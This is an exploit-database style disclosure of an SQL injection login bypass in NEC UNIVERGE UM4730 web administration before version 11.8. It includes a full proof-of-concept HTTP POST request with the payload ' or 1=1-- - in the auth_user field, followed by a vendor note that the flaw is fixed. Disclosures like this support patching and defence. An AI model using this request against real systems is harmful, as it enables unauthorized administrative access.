# Exploit Title: NEC UNIVERGE UM4730 < 11.8 SQL injection # Vulnerbility: SQL injection login bypass # Date: 15-12-2016 # Exploit Author: b0x41s # Author web: https://www.xrayit.nl # Vendor Homepage: https://www.nec-enterprise.com # Category: webapps # Version: 11.6.0.31 # Tested on: Windows server 2008 Description: The auth_user parameter is vulnerable to SQL injection. The login can be bypassed. POC: POST /admin/index.php HTTP/1.1 Host: 127.0.0.1 Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Referer: https://127.0.0.1/admin/index.php Content-Type: application/x-www-form-urlencoded Content-Lenght: 105 Cookie: PHPSESSID=dadu22lsue7utch05a24lgp54; g_lang=en submitButton=submitButton%3dSing+in&formSubmitted=1&auth_pw=root&auth_user='%20or%201=1--%20-&login_language_select=de Fix answer from vendor: The WAC login page is no longer available to sql injection bypassing authentication.The fix was committed prior to releasing 11.8.